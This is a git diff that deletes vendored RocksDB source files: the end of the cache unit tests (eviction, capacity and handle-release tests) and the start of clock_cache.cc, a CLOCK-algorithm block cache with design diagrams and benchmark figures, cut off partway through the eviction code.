-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  cache_->Release(h2);
-  ASSERT_EQ(2U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[1]);
-  ASSERT_EQ(102, deleted_values_[1]);
-  ASSERT_EQ(0U, cache_->GetUsage());
-}
-
-TEST_P(CacheTest, EvictionPolicy) {
-  Insert(100, 101);
-  Insert(200, 201);
-
-  // Frequently used entry must be kept around
-  for (int i = 0; i < kCacheSize + 100; i++) {
-    Insert(1000+i, 2000+i);
-    ASSERT_EQ(101, Lookup(100));
-  }
-  ASSERT_EQ(101, Lookup(100));
-  ASSERT_EQ(-1, Lookup(200));
-}
-
-TEST_P(CacheTest, ExternalRefPinsEntries) {
-  Insert(100, 101);
-  Cache::Handle* h = cache_->Lookup(EncodeKey(100));
-  ASSERT_TRUE(cache_->Ref(h));
-  ASSERT_EQ(101, DecodeValue(cache_->Value(h)));
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  for (int i = 0; i < 3; ++i) {
-    if (i > 0) {
-      // First release (i == 1) corresponds to Ref(), second release (i == 2)
-      // corresponds to Lookup(). Then, since all external refs are released,
-      // the below insertions should push out the cache entry.
-      cache_->Release(h);
-    }
-    // double cache size because the usage bit in block cache prevents 100 from
-    // being evicted in the first kCacheSize iterations
-    for (int j = 0; j < 2 * kCacheSize + 100; j++) {
-      Insert(1000 + j, 2000 + j);
-    }
-    if (i < 2) {
-      ASSERT_EQ(101, Lookup(100));
-    }
-  }
-  ASSERT_EQ(-1, Lookup(100));
-}
-
-TEST_P(CacheTest, EvictionPolicyRef) {
-  Insert(100, 101);
-  Insert(101, 102);
-  Insert(102, 103);
-  Insert(103, 104);
-  Insert(200, 101);
-  Insert(201, 102);
-  Insert(202, 103);
-  Insert(203, 104);
-  Cache::Handle* h201 = cache_->Lookup(EncodeKey(200));
-  Cache::Handle* h202 = cache_->Lookup(EncodeKey(201));
-  Cache::Handle* h203 = cache_->Lookup(EncodeKey(202));
-  Cache::Handle* h204 = cache_->Lookup(EncodeKey(203));
-  Insert(300, 101);
-  Insert(301, 102);
-  Insert(302, 103);
-  Insert(303, 104);
-
-  // Insert entries much more than Cache capacity
-  for (int i = 0; i < kCacheSize + 100; i++) {
-    Insert(1000 + i, 2000 + i);
-  }
-
-  // Check whether the entries inserted in the beginning
-  // are evicted. Ones without extra ref are evicted and
-  // those with are not.
-  ASSERT_EQ(-1, Lookup(100));
-  ASSERT_EQ(-1, Lookup(101));
-  ASSERT_EQ(-1, Lookup(102));
-  ASSERT_EQ(-1, Lookup(103));
-
-  ASSERT_EQ(-1, Lookup(300));
-  ASSERT_EQ(-1, Lookup(301));
-  ASSERT_EQ(-1, Lookup(302));
-  ASSERT_EQ(-1, Lookup(303));
-
-  ASSERT_EQ(101, Lookup(200));
-  ASSERT_EQ(102, Lookup(201));
-  ASSERT_EQ(103, Lookup(202));
-  ASSERT_EQ(104, Lookup(203));
-
-  // Cleaning up all the handles
-  cache_->Release(h201);
-  cache_->Release(h202);
-  cache_->Release(h203);
-  cache_->Release(h204);
-}
-
-TEST_P(CacheTest, EvictEmptyCache) {
-  // Insert item large than capacity to trigger eviction on empty cache.
-  auto cache = NewCache(1, 0, false);
-  ASSERT_OK(cache->Insert("foo", nullptr, 10, dumbDeleter));
-}
-
-TEST_P(CacheTest, EraseFromDeleter) {
-  // Have deleter which will erase item from cache, which will re-enter
-  // the cache at that point.
-  std::shared_ptr<Cache> cache = NewCache(10, 0, false);
-  ASSERT_OK(cache->Insert("foo", nullptr, 1, dumbDeleter));
-  ASSERT_OK(cache->Insert("bar", cache.get(), 1, eraseDeleter));
-  cache->Erase("bar");
-  ASSERT_EQ(nullptr, cache->Lookup("foo"));
-  ASSERT_EQ(nullptr, cache->Lookup("bar"));
-}
-
-TEST_P(CacheTest, ErasedHandleState) {
-  // insert a key and get two handles
-  Insert(100, 1000);
-  Cache::Handle* h1 = cache_->Lookup(EncodeKey(100));
-  Cache::Handle* h2 = cache_->Lookup(EncodeKey(100));
-  ASSERT_EQ(h1, h2);
-  ASSERT_EQ(DecodeValue(cache_->Value(h1)), 1000);
-  ASSERT_EQ(DecodeValue(cache_->Value(h2)), 1000);
-
-  // delete the key from the cache
-  Erase(100);
-  // can no longer find in the cache
-  ASSERT_EQ(-1, Lookup(100));
-
-  // release one handle
-  cache_->Release(h1);
-  // still can't find in cache
-  ASSERT_EQ(-1, Lookup(100));
-
-  cache_->Release(h2);
-}
-
-TEST_P(CacheTest, HeavyEntries) {
-  // Add a bunch of light and heavy entries and then count the combined
-  // size of items still in the cache, which must be approximately the
-  // same as the total capacity.
-  const int kLight = 1;
-  const int kHeavy = 10;
-  int added = 0;
-  int index = 0;
-  while (added < 2*kCacheSize) {
-    const int weight = (index & 1) ? kLight : kHeavy;
-    Insert(index, 1000+index, weight);
-    added += weight;
-    index++;
-  }
-
-  int cached_weight = 0;
-  for (int i = 0; i < index; i++) {
-    const int weight = (i & 1 ? kLight : kHeavy);
-    int r = Lookup(i);
-    if (r >= 0) {
-      cached_weight += weight;
-      ASSERT_EQ(1000+i, r);
-    }
-  }
-  ASSERT_LE(cached_weight, kCacheSize + kCacheSize/10);
-}
-
-TEST_P(CacheTest, NewId) {
-  uint64_t a = cache_->NewId();
-  uint64_t b = cache_->NewId();
-  ASSERT_NE(a, b);
-}
-
-
-class Value {
- public:
-  explicit Value(size_t v) : v_(v) { }
-
-  size_t v_;
-};
-
-namespace {
-void deleter(const Slice& key, void* value) {
-  delete static_cast<Value *>(value);
-}
-}  // namespace
-
-TEST_P(CacheTest, ReleaseAndErase) {
-  std::shared_ptr<Cache> cache = NewCache(5, 0, false);
-  Cache::Handle* handle;
-  Status s = cache->Insert(EncodeKey(100), EncodeValue(100), 1,
-                           &CacheTest::Deleter, &handle);
-  ASSERT_TRUE(s.ok());
-  ASSERT_EQ(5U, cache->GetCapacity());
-  ASSERT_EQ(1U, cache->GetUsage());
-  ASSERT_EQ(0U, deleted_keys_.size());
-  auto erased = cache->Release(handle, true);
-  ASSERT_TRUE(erased);
-  // This tests that deleter has been called
-  ASSERT_EQ(1U, deleted_keys_.size());
-}
-
-TEST_P(CacheTest, ReleaseWithoutErase) {
-  std::shared_ptr<Cache> cache = NewCache(5, 0, false);
-  Cache::Handle* handle;
-  Status s = cache->Insert(EncodeKey(100), EncodeValue(100), 1,
-                           &CacheTest::Deleter, &handle);
-  ASSERT_TRUE(s.ok());
-  ASSERT_EQ(5U, cache->GetCapacity());
-  ASSERT_EQ(1U, cache->GetUsage());
-  ASSERT_EQ(0U, deleted_keys_.size());
-  auto erased = cache->Release(handle);
-  ASSERT_FALSE(erased);
-  // This tests that deleter is not called. When cache has free capacity it is
-  // not expected to immediately erase the released items.
-  ASSERT_EQ(0U, deleted_keys_.size());
-}
-
-TEST_P(CacheTest, SetCapacity) {
-  // test1: increase capacity
-  // lets create a cache with capacity 5,
-  // then, insert 5 elements, then increase capacity
-  // to 10, returned capacity should be 10, usage=5
-  std::shared_ptr<Cache> cache = NewCache(5, 0, false);
-  std::vector<Cache::Handle*> handles(10);
-  // Insert 5 entries, but not releasing.
-  for (size_t i = 0; i < 5; i++) {
-    std::string key = ToString(i+1);
-    Status s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_TRUE(s.ok());
-  }
-  ASSERT_EQ(5U, cache->GetCapacity());
-  ASSERT_EQ(5U, cache->GetUsage());
-  cache->SetCapacity(10);
-  ASSERT_EQ(10U, cache->GetCapacity());
-  ASSERT_EQ(5U, cache->GetUsage());
-
-  // test2: decrease capacity
-  // insert 5 more elements to cache, then release 5,
-  // then decrease capacity to 7, final capacity should be 7
-  // and usage should be 7
-  for (size_t i = 5; i < 10; i++) {
-    std::string key = ToString(i+1);
-    Status s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_TRUE(s.ok());
-  }
-  ASSERT_EQ(10U, cache->GetCapacity());
-  ASSERT_EQ(10U, cache->GetUsage());
-  for (size_t i = 0; i < 5; i++) {
-    cache->Release(handles[i]);
-  }
-  ASSERT_EQ(10U, cache->GetCapacity());
-  ASSERT_EQ(10U, cache->GetUsage());
-  cache->SetCapacity(7);
-  ASSERT_EQ(7, cache->GetCapacity());
-  ASSERT_EQ(7, cache->GetUsage());
-
-  // release remaining 5 to keep valgrind happy
-  for (size_t i = 5; i < 10; i++) {
-    cache->Release(handles[i]);
-  }
-}
-
-TEST_P(CacheTest, SetStrictCapacityLimit) {
-  // test1: set the flag to false. Insert more keys than capacity. See if they
-  // all go through.
-  std::shared_ptr<Cache> cache = NewLRUCache(5, 0, false);
-  std::vector<Cache::Handle*> handles(10);
-  Status s;
-  for (size_t i = 0; i < 10; i++) {
-    std::string key = ToString(i + 1);
-    s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_OK(s);
-    ASSERT_NE(nullptr, handles[i]);
-  }
-
-  // test2: set the flag to true. Insert and check if it fails.
-  std::string extra_key = "extra";
-  Value* extra_value = new Value(0);
-  cache->SetStrictCapacityLimit(true);
-  Cache::Handle* handle;
-  s = cache->Insert(extra_key, extra_value, 1, &deleter, &handle);
-  ASSERT_TRUE(s.IsIncomplete());
-  ASSERT_EQ(nullptr, handle);
-
-  for (size_t i = 0; i < 10; i++) {
-    cache->Release(handles[i]);
-  }
-
-  // test3: init with flag being true.
-  std::shared_ptr<Cache> cache2 = NewLRUCache(5, 0, true);
-  for (size_t i = 0; i < 5; i++) {
-    std::string key = ToString(i + 1);
-    s = cache2->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_OK(s);
-    ASSERT_NE(nullptr, handles[i]);
-  }
-  s = cache2->Insert(extra_key, extra_value, 1, &deleter, &handle);
-  ASSERT_TRUE(s.IsIncomplete());
-  ASSERT_EQ(nullptr, handle);
-  // test insert without handle
-  s = cache2->Insert(extra_key, extra_value, 1, &deleter);
-  // AS if the key have been inserted into cache but get evicted immediately.
-  ASSERT_OK(s);
-  ASSERT_EQ(5, cache->GetUsage());
-  ASSERT_EQ(nullptr, cache2->Lookup(extra_key));
-
-  for (size_t i = 0; i < 5; i++) {
-    cache2->Release(handles[i]);
-  }
-}
-
-TEST_P(CacheTest, OverCapacity) {
-  size_t n = 10;
-
-  // a LRUCache with n entries and one shard only
-  std::shared_ptr<Cache> cache = NewCache(n, 0, false);
-
-  std::vector<Cache::Handle*> handles(n+1);
-
-  // Insert n+1 entries, but not releasing.
-  for (size_t i = 0; i < n + 1; i++) {
-    std::string key = ToString(i+1);
-    Status s = cache->Insert(key, new Value(i + 1), 1, &deleter, &handles[i]);
-    ASSERT_TRUE(s.ok());
-  }
-
-  // Guess what's in the cache now?
-  for (size_t i = 0; i < n + 1; i++) {
-    std::string key = ToString(i+1);
-    auto h = cache->Lookup(key);
-    ASSERT_TRUE(h != nullptr);
-    if (h) cache->Release(h);
-  }
-
-  // the cache is over capacity since nothing could be evicted
-  ASSERT_EQ(n + 1U, cache->GetUsage());
-  for (size_t i = 0; i < n + 1; i++) {
-    cache->Release(handles[i]);
-  }
-  // Make sure eviction is triggered.
-  cache->SetCapacity(n);
-
-  // cache is under capacity now since elements were released
-  ASSERT_EQ(n, cache->GetUsage());
-
-  // element 0 is evicted and the rest is there
-  // This is consistent with the LRU policy since the element 0
-  // was released first
-  for (size_t i = 0; i < n + 1; i++) {
-    std::string key = ToString(i+1);
-    auto h = cache->Lookup(key);
-    if (h) {
-      ASSERT_NE(i, 0U);
-      cache->Release(h);
-    } else {
-      ASSERT_EQ(i, 0U);
-    }
-  }
-}
-
-namespace {
-std::vector<std::pair<int, int>> callback_state;
-void callback(void* entry, size_t charge) {
-  callback_state.push_back({DecodeValue(entry), static_cast<int>(charge)});
-}
-};
-
-TEST_P(CacheTest, ApplyToAllCacheEntiresTest) {
-  std::vector<std::pair<int, int>> inserted;
-  callback_state.clear();
-
-  for (int i = 0; i < 10; ++i) {
-    Insert(i, i * 2, i + 1);
-    inserted.push_back({i * 2, i + 1});
-  }
-  cache_->ApplyToAllCacheEntries(callback, true);
-
-  std::sort(inserted.begin(), inserted.end());
-  std::sort(callback_state.begin(), callback_state.end());
-  ASSERT_TRUE(inserted == callback_state);
-}
-
-TEST_P(CacheTest, DefaultShardBits) {
-  // test1: set the flag to false. Insert more keys than capacity. See if they
-  // all go through.
-  std::shared_ptr<Cache> cache = NewCache(16 * 1024L * 1024L);
-  ShardedCache* sc = dynamic_cast<ShardedCache*>(cache.get());
-  ASSERT_EQ(5, sc->GetNumShardBits());
-
-  cache = NewLRUCache(511 * 1024L, -1, true);
-  sc = dynamic_cast<ShardedCache*>(cache.get());
-  ASSERT_EQ(0, sc->GetNumShardBits());
-
-  cache = NewLRUCache(1024L * 1024L * 1024L, -1, true);
-  sc = dynamic_cast<ShardedCache*>(cache.get());
-  ASSERT_EQ(6, sc->GetNumShardBits());
-}
-
-#ifdef SUPPORT_CLOCK_CACHE
-shared_ptr<Cache> (*new_clock_cache_func)(size_t, int, bool) = NewClockCache;
-INSTANTIATE_TEST_CASE_P(CacheTestInstance, CacheTest,
-                        testing::Values(kLRU, kClock));
-#else
-INSTANTIATE_TEST_CASE_P(CacheTestInstance, CacheTest, testing::Values(kLRU));
-#endif  // SUPPORT_CLOCK_CACHE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/cache/clock_cache.cc b/thirdparty/rocksdb/cache/clock_cache.cc
deleted file mode 100644
index 7e42714..0000000
--- a/thirdparty/rocksdb/cache/clock_cache.cc
+++ /dev/null
@@ -1,729 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "cache/clock_cache.h"
-
-#ifndef SUPPORT_CLOCK_CACHE
-
-namespace rocksdb {
-
-std::shared_ptr<Cache> NewClockCache(size_t capacity, int num_shard_bits,
-                                     bool strict_capacity_limit) {
-  // Clock cache not supported.
-  return nullptr;
-}
-
-}  // namespace rocksdb
-
-#else
-
-#include <assert.h>
-#include <atomic>
-#include <deque>
-
-// "tbb/concurrent_hash_map.h" requires RTTI if exception is enabled.
-// Disable it so users can chooose to disable RTTI.
-#ifndef ROCKSDB_USE_RTTI
-#define TBB_USE_EXCEPTIONS 0
-#endif
-#include "tbb/concurrent_hash_map.h"
-
-#include "cache/sharded_cache.h"
-#include "port/port.h"
-#include "util/autovector.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-namespace {
-
-// An implementation of the Cache interface based on CLOCK algorithm, with
-// better concurrent performance than LRUCache. The idea of CLOCK algorithm
-// is to maintain all cache entries in a circular list, and an iterator
-// (the "head") pointing to the last examined entry. Eviction starts from the
-// current head. Each entry is given a second chance before eviction, if it
-// has been access since last examine. In contrast to LRU, no modification
-// to the internal data-structure (except for flipping the usage bit) needs
-// to be done upon lookup. This gives us oppertunity to implement a cache
-// with better concurrency.
-//
-// Each cache entry is represented by a cache handle, and all the handles
-// are arranged in a circular list, as describe above. Upon erase of an entry,
-// we never remove the handle. Instead, the handle is put into a recycle bin
-// to be re-use. This is to avoid memory dealocation, which is hard to deal
-// with in concurrent environment.
-//
-// The cache also maintains a concurrent hash map for lookup. Any concurrent
-// hash map implementation should do the work. We currently use
-// tbb::concurrent_hash_map because it supports concurrent erase.
-//
-// Each cache handle has the following flags and counters, which are squeeze
-// in an atomic interger, to make sure the handle always be in a consistent
-// state:
-//
-//   * In-cache bit: whether the entry is reference by the cache itself. If
-//     an entry is in cache, its key would also be available in the hash map.
-//   * Usage bit: whether the entry has been access by user since last
-//     examine for eviction. Can be reset by eviction.
-//   * Reference count: reference count by user.
-//
-// An entry can be reference only when it's in cache. An entry can be evicted
-// only when it is in cache, has no usage since last examine, and reference
-// count is zero.
-//
-// The follow figure shows a possible layout of the cache. Boxes represents
-// cache handles and numbers in each box being in-cache bit, usage bit and
-// reference count respectively.
-//
-//    hash map:
-//      +-------+--------+
-//      |  key  | handle |
-//      +-------+--------+
-//      | "foo" |    5   |-------------------------------------+
-//      +-------+--------+                                     |
-//      | "bar" |    2   |--+                                  |
-//      +-------+--------+  |                                  |
-//                          |                                  |
-//                     head |                                  |
-//                       |  |                                  |
-//    circular list:     |  |                                  |
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//         |(0,0,0)|---|(1,1,0)|---|(0,0,0)|---|(0,1,3)|---|(1,0,0)|---|  ...
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//             |                       |
-//             +-------+   +-----------+
-//                     |   |
-//                   +---+---+
-//    recycle bin:   | 1 | 3 |
-//                   +---+---+
-//
-// Suppose we try to insert "baz" into the cache at this point and the cache is
-// full. The cache will first look for entries to evict, starting from where
-// head points to (the second entry). It resets usage bit of the second entry,
-// skips the third and fourth entry since they are not in cache, and finally
-// evict the fifth entry ("foo"). It looks at recycle bin for available handle,
-// grabs handle 3, and insert the key into the handle. The following figure
-// shows the resulting layout.
-//
-//    hash map:
-//      +-------+--------+
-//      |  key  | handle |
-//      +-------+--------+
-//      | "baz" |    3   |-------------+
-//      +-------+--------+             |
-//      | "bar" |    2   |--+          |
-//      +-------+--------+  |          |
-//                          |          |
-//                          |          |                                 head
-//                          |          |                                   |
-//    circular list:        |          |                                   |
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//         |(0,0,0)|---|(1,0,0)|---|(1,0,0)|---|(0,1,3)|---|(0,0,0)|---|  ...
-//         +-------+   +-------+   +-------+   +-------+   +-------+   +-------
-//             |                                               |
-//             +-------+   +-----------------------------------+
-//                     |   |
-//                   +---+---+
-//    recycle bin:   | 1 | 5 |
-//                   +---+---+
-//
-// A global mutex guards the circular list, the head, and the recycle bin.
-// We additionally require that modifying the hash map needs to hold the mutex.
-// As such, Modifying the cache (such as Insert() and Erase()) require to
-// hold the mutex. Lookup() only access the hash map and the flags associated
-// with each handle, and don't require explicit locking. Release() has to
-// acquire the mutex only when it releases the last reference to the entry and
-// the entry has been erased from cache explicitly. A future improvement could
-// be to remove the mutex completely.
-//
-// Benchmark:
-// We run readrandom db_bench on a test DB of size 13GB, with size of each
-// level:
-//
-//    Level    Files   Size(MB)
-//    -------------------------
-//      L0        1       0.01
-//      L1       18      17.32
-//      L2      230     182.94
-//      L3     1186    1833.63
-//      L4     4602    8140.30
-//
-// We test with both 32 and 16 read threads, with 2GB cache size (the whole DB
-// doesn't fits in) and 64GB cache size (the whole DB can fit in cache), and
-// whether to put index and filter blocks in block cache. The benchmark runs
-// with
-// with RocksDB 4.10. We got the following result:
-//
-// Threads Cache     Cache               ClockCache               LRUCache
-//         Size  Index/Filter Throughput(MB/s)   Hit Throughput(MB/s)    Hit
-//     32   2GB       yes               466.7  85.9%           433.7   86.5%
-//     32   2GB       no                529.9  72.7%           532.7   73.9%
-//     32  64GB       yes               649.9  99.9%           507.9   99.9%
-//     32  64GB       no                740.4  99.9%           662.8   99.9%
-//     16   2GB       yes               278.4  85.9%           283.4   86.5%
-//     16   2GB       no                318.6  72.7%           335.8   73.9%
-//     16  64GB       yes               391.9  99.9%           353.3   99.9%
-//     16  64GB       no                433.8  99.8%           419.4   99.8%
-
-// Cache entry meta data.
-struct CacheHandle {
-  Slice key;
-  uint32_t hash;
-  void* value;
-  size_t charge;
-  void (*deleter)(const Slice&, void* value);
-
-  // Flags and counters associated with the cache handle:
-  //   lowest bit: n-cache bit
-  //   second lowest bit: usage bit
-  //   the rest bits: reference count
-  // The handle is unused when flags equals to 0. The thread decreases the count
-  // to 0 is responsible to put the handle back to recycle_ and cleanup memory.
-  std::atomic<uint32_t> flags;
-
-  CacheHandle() = default;
-
-  CacheHandle(const CacheHandle& a) { *this = a; }
-
-  CacheHandle(const Slice& k, void* v,
-              void (*del)(const Slice& key, void* value))
-      : key(k), value(v), deleter(del) {}
-
-  CacheHandle& operator=(const CacheHandle& a) {
-    // Only copy members needed for deletion.
-    key = a.key;
-    value = a.value;
-    deleter = a.deleter;
-    return *this;
-  }
-};
-
-// Key of hash map. We store hash value with the key for convenience.
-struct CacheKey {
-  Slice key;
-  uint32_t hash_value;
-
-  CacheKey() = default;
-
-  CacheKey(const Slice& k, uint32_t h) {
-    key = k;
-    hash_value = h;
-  }
-
-  static bool equal(const CacheKey& a, const CacheKey& b) {
-    return a.hash_value == b.hash_value && a.key == b.key;
-  }
-
-  static size_t hash(const CacheKey& a) {
-    return static_cast<size_t>(a.hash_value);
-  }
-};
-
-struct CleanupContext {
-  // List of values to be deleted, along with the key and deleter.
-  autovector<CacheHandle> to_delete_value;
-
-  // List of keys to be deleted.
-  autovector<const char*> to_delete_key;
-};
-
-// A cache shard which maintains its own CLOCK cache.
-class ClockCacheShard : public CacheShard {
- public:
-  // Hash map type.
-  typedef tbb::concurrent_hash_map<CacheKey, CacheHandle*, CacheKey> HashTable;
-
-  ClockCacheShard();
-  ~ClockCacheShard();
-
-  // Interfaces
-  virtual void SetCapacity(size_t capacity) override;
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override;
-  virtual Status Insert(const Slice& key, uint32_t hash, void* value,
-                        size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Cache::Handle** handle,
-                        Cache::Priority priority) override;
-  virtual Cache::Handle* Lookup(const Slice& key, uint32_t hash) override;
-  // If the entry in in cache, increase reference count and return true.
-  // Return false otherwise.
-  //
-  // Not necessary to hold mutex_ before being called.
-  virtual bool Ref(Cache::Handle* handle) override;
-  virtual bool Release(Cache::Handle* handle,
-                       bool force_erase = false) override;
-  virtual void Erase(const Slice& key, uint32_t hash) override;
-  bool EraseAndConfirm(const Slice& key, uint32_t hash,
-                       CleanupContext* context);
-  virtual size_t GetUsage() const override;
-  virtual size_t GetPinnedUsage() const override;
-  virtual void EraseUnRefEntries() override;
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override;
-
- private:
-  static const uint32_t kInCacheBit = 1;
-  static const uint32_t kUsageBit = 2;
-  static const uint32_t kRefsOffset = 2;
-  static const uint32_t kOneRef = 1 << kRefsOffset;
-
-  // Helper functions to extract cache handle flags and counters.
-  static bool InCache(uint32_t flags) { return flags & kInCacheBit; }
-  static bool HasUsage(uint32_t flags) { return flags & kUsageBit; }
-  static uint32_t CountRefs(uint32_t flags) { return flags >> kRefsOffset; }
-
-  // Decrease reference count of the entry. If this decreases the count to 0,
-  // recycle the entry. If set_usage is true, also set the usage bit.
-  //
-  // returns true if a value is erased.
-  //
-  // Not necessary to hold mutex_ before being called.
-  bool Unref(CacheHandle* handle, bool set_usage, CleanupContext* context);
-
-  // Unset in-cache bit of the entry. Recycle the handle if necessary.
-  //
-  // returns true if a value is erased.
-  //
-  // Has to hold mutex_ before being called.
-  bool UnsetInCache(CacheHandle* handle, CleanupContext* context);
-
-  // Put the handle back to recycle_ list, and put the value associated with
-  // it into to-be-deleted list. It doesn't cleanup the key as it might be
-  // reused by another handle.
-  //
-  // Has to hold mutex_ before being called.
-  void RecycleHandle(CacheHandle* handle, CleanupContext* context);
-
-  // Delete keys and values in to-be-deleted list. Call the method without
-  // holding mutex, as destructors can be expensive.
-  void Cleanup(const CleanupContext& context);
-
-  // Examine the handle for eviction. If the handle is in cache, usage bit is
-  // not set, and referece count is 0, evict it from cache. Otherwise unset
-  // the usage bit.
-  //
-  // Has to hold mutex_ before being called.
-  bool TryEvict(CacheHandle* value, CleanupContext* context);
-
-  // Scan through the circular list, evict entries until we get enough capacity
-  // for new cache entry of specific size. Return true if success, false
-  // otherwise.
-  //
-  // Has to hold mutex_ before being called.
-  bool EvictFromCache(size_t charge, CleanupContext* context);
-
-  CacheHandle* Insert(const Slice& key, uint32_t hash, void* value,
-                      size_t change,
-                      void (*deleter)(const Slice& key, void* value),
-                      bool hold_reference, CleanupContext* context);
-
-  // Guards list_, head_, and recycle_. In addition, updating table_ also has
-  // to hold the mutex, to avoid the cache being in inconsistent state.
-  mutable port::Mutex mutex_;
-
-  // The circular list of cache handles. Initially the list is empty. Once a
-  // handle is needed by insertion, and no more handles are available in
-  // recycle bin, one more handle is appended to the end.
-  //
-  // We use std::deque for the circular list because we want to make sure
-  // pointers to handles are valid through out the life-cycle of the cache
-  // (in contrast to std::vector), and be able to grow the list (in contrast
-  // to statically allocated arrays).
-  std::deque<CacheHandle> list_;
-
-  // Pointer to the next handle in the circular list to be examine for
-  // eviction.
-  size_t head_;
-
-  // Recycle bin of cache handles.
-  autovector<CacheHandle*> recycle_;
-
-  // Maximum cache size.
-  std::atomic<size_t> capacity_;
-
-  // Current total size of the cache.
-  std::atomic<size_t> usage_;
-
-  // Total un-released cache size.
-  std::atomic<size_t> pinned_usage_;
-
-  // Whether allow insert into cache if cache is full.
-  std::atomic<bool> strict_capacity_limit_;
-
-  // Hash table (tbb::concurrent_hash_map) for lookup.
-  HashTable table_;
-};
-
-ClockCacheShard::ClockCacheShard()
-    : head_(0), usage_(0), pinned_usage_(0), strict_capacity_limit_(false) {}
-
-ClockCacheShard::~ClockCacheShard() {
-  for (auto& handle : list_) {
-    uint32_t flags = handle.flags.load(std::memory_order_relaxed);
-    if (InCache(flags) || CountRefs(flags) > 0) {
-      (*handle.deleter)(handle.key, handle.value);
-      delete[] handle.key.data();
-    }
-  }
-}
-
-size_t ClockCacheShard::GetUsage() const {
-  return usage_.load(std::memory_order_relaxed);
-}
-
-size_t ClockCacheShard::GetPinnedUsage() const {
-  return pinned_usage_.load(std::memory_order_relaxed);
-}
-
-void ClockCacheShard::ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                             bool thread_safe) {
-  if (thread_safe) {
-    mutex_.Lock();
-  }
-  for (auto& handle : list_) {
-    // Use relaxed semantics instead of acquire semantics since we are either
-    // holding mutex, or don't have thread safe requirement.
-    uint32_t flags = handle.flags.load(std::memory_order_relaxed);
-    if (InCache(flags)) {
-      callback(handle.value, handle.charge);
-    }
-  }
-  if (thread_safe) {
-    mutex_.Unlock();
-  }
-}
-
-void ClockCacheShard::RecycleHandle(CacheHandle* handle,
-                                    CleanupContext* context) {
-  mutex_.AssertHeld();
-  assert(!InCache(handle->flags) && CountRefs(handle->flags) == 0);
-  context->to_delete_key.push_back(handle->key.data());
-  context->to_delete_value.emplace_back(*handle);
-  handle->key.clear();
-  handle->value = nullptr;
-  handle->deleter = nullptr;
-  recycle_.push_back(handle);
-  usage_.fetch_sub(handle->charge, std::memory_order_relaxed);
-}
-
-void ClockCacheShard::Cleanup(const CleanupContext& context) {
-  for (const CacheHandle& handle : context.to_delete_value) {
-    if (handle.deleter) {
-      (*handle.deleter)(handle.key, handle.value);
-    }
-  }
-  for (const char* key : context.to_delete_key) {
-    delete[] key;
-  }
-}
-
-bool ClockCacheShard::Ref(Cache::Handle* h) {
-  auto handle = reinterpret_cast<CacheHandle*>(h);
-  // CAS loop to increase reference count.
-  uint32_t flags = handle->flags.load(std::memory_order_relaxed);
-  while (InCache(flags)) {
-    // Use acquire semantics on success, as further operations on the cache
-    // entry has to be order after reference count is increased.
-    if (handle->flags.compare_exchange_weak(flags, flags + kOneRef,
-                                            std::memory_order_acquire,
-                                            std::memory_order_relaxed)) {
-      if (CountRefs(flags) == 0) {
-        // No reference count before the operation.
-        pinned_usage_.fetch_add(handle->charge, std::memory_order_relaxed);
-      }
-      return true;
-    }
-  }
-  return false;
-}
-
-bool ClockCacheShard::Unref(CacheHandle* handle, bool set_usage,
-                            CleanupContext* context) {
-  if (set_usage) {
-    handle->flags.fetch_or(kUsageBit, std::memory_order_relaxed);
-  }
-  // Use acquire-release semantics as previous operations on the cache entry
-  // has to be order before reference count is decreased, and potential cleanup
-  // of the entry has to be order after.
-  uint32_t flags = handle->flags.fetch_sub(kOneRef, std::memory_order_acq_rel);
-  assert(CountRefs(flags) > 0);
-  if (CountRefs(flags) == 1) {
-    // this is the last reference.
-    pinned_usage_.fetch_sub(handle->charge, std::memory_order_relaxed);
-    // Cleanup if it is the last reference.
-    if (!InCache(flags)) {
-      MutexLock l(&mutex_);
-      RecycleHandle(handle, context);
-    }
-  }
-  return context->to_delete_value.size();
-}
-
-bool ClockCacheShard::UnsetInCache(CacheHandle* handle,
-                                   CleanupContext* context) {
-  mutex_.AssertHeld();
-  // Use acquire-release semantics as previous operations on the cache entry
-  // has to be order before reference count is decreased, and potential cleanup
-  // of the entry has to be order after.
-  uint32_t flags =
-      handle->flags.fetch_and(~kInCacheBit, std::memory_order_acq_rel);
-  // Cleanup if it is the last reference.
-  if (InCache(flags) && CountRefs(flags) == 0) {
-    RecycleHandle(handle, context);
-  }
-  return context->to_delete_value.size();
-}
-
-bool ClockCacheShard::TryEvict(CacheHandle* handle, CleanupContext* context) {
-  mutex_.AssertHeld();
-  uint32_t flags = kInCacheBit;
-  if (handle->flags.compare_exchange_strong(flags, 0, std::memory_order_acquire,
-                                            std::memory_order_relaxed)) {
-    bool erased __attribute__((__unused__)) =
-        table_.erase(CacheKey(handle->key, handle->hash));
-    assert(erased);
-    RecycleHandle(handle, context);
-    return true;
-  }
-  handle->flags.fetch_and(~kUsageBit, std::memory_order_relaxed);
-  return false;
-}
-
-bool ClockCacheShard::EvictFromCache(size_t charge, CleanupContext* context) {
-  size_t usage = usage_.load(std::memory_order_relaxed);
-  size_t capacity = capacity_.load(std::memory_order_relaxed);
-  if (usage == 0) {
-    return charge <= capacity;
